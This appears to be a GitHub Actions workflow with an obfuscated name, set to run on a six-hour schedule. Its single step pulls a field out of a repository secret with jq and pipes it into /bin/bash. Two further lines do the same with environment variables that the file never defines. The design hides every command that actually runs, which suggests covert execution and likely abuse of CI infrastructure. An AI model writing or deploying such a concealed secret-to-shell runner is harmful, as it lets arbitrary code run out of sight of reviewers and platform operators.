name: guanzhongxian6226

on:
  workflow_dispatch:
  schedule:
    - cron: '15 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guanzhongxian6226
        env:
          rn5: ${{ secrets.rn5 }}
        run: |
          echo $rn5 | jq -r .y217 | /bin/bash
          echo $hjyze09 | jq -r .snfd5 | /bin/bash
          echo $fgeui7373 | jq -r .cv62676 | /bin/bash

